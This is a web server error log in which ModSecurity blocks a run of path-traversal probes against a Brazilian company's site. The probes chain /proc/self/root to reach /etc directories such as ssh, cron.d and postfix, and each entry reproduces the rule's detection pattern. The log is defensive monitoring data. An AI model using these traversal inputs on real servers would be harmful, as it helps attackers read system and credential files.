[Fri Mar 20 04:29:32.861772 2026] [:error] [pid 11167:tid 140411599251200] [client 74.7.241.31:39744] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3XPHIg5MgXLBnicPS7wAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:34.154000 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.241.31:39756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3XgF0L0L-SsrnPo4_xAAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:36.362461 2026] [:error] [pid 11167:tid 140411641214720] [client 74.7.241.31:39760] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3X_HIg5MgXLBnicPS8QAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:38.726281 2026] [:error] [pid 11642:tid 140411607643904] [client 74.7.241.31:51082] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3Ybninkcc-iUj5Ao1YAAAA5A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:41.908426 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:51088] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3Zda6ubjKNq_cu4anBwAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:45.908013 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.241.31:51090] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3aTJ3M9BSuKP7CAboUwAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:48.367255 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:34930] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3bNa6ubjKNq_cu4anFgAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:51.741328 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:34936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3bda6ubjKNq_cu4anGgAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:54.335017 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:34940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3cta6ubjKNq_cu4anIQAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:56.712185 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.241.31:34942] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3dBCii7xarUs8iHY9VAAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:10.688335 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:44434] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3guoXxyEfFpUF8f9a4wAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:11.975348 2026] [:error] [pid 11642:tid 140411574073088] [client 74.7.241.31:47736] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3g7ninkcc-iUj5Ao1ZwAAA5Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:13.335208 2026] [:error] [pid 11167:tid 140411540502272] [client 74.7.241.31:47742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3hfHIg5MgXLBnicPTBAAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:14.599596 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.241.31:47752] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3huoXxyEfFpUF8f9a5AAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:16.935324 2026] [:error] [pid 9818:tid 140411725141760] [client 74.7.241.31:47764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3iF1pVZ5mVmJwsFMInQAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:21.539144 2026] [:error] [pid 11167:tid 140411666392832] [client 74.7.241.31:42102] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3jfHIg5MgXLBnicPTCAAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:22.795016 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.241.31:42118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3jvXLqtnMIWvjpaJwvAAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:25.511076 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.241.31:42134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3kfXLqtnMIWvjpaJwwgAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:26.807064 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.241.31:42150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3kvqxLDW4GITHUkS58gAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:29.492558 2026] [:error] [pid 11642:tid 140411649607424] [client 74.7.241.31:59920] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3lLninkcc-iUj5Ao1bwAAA4s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:30.547178 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.243.128:51724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3lvXLqtnMIWvjpaJwygAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
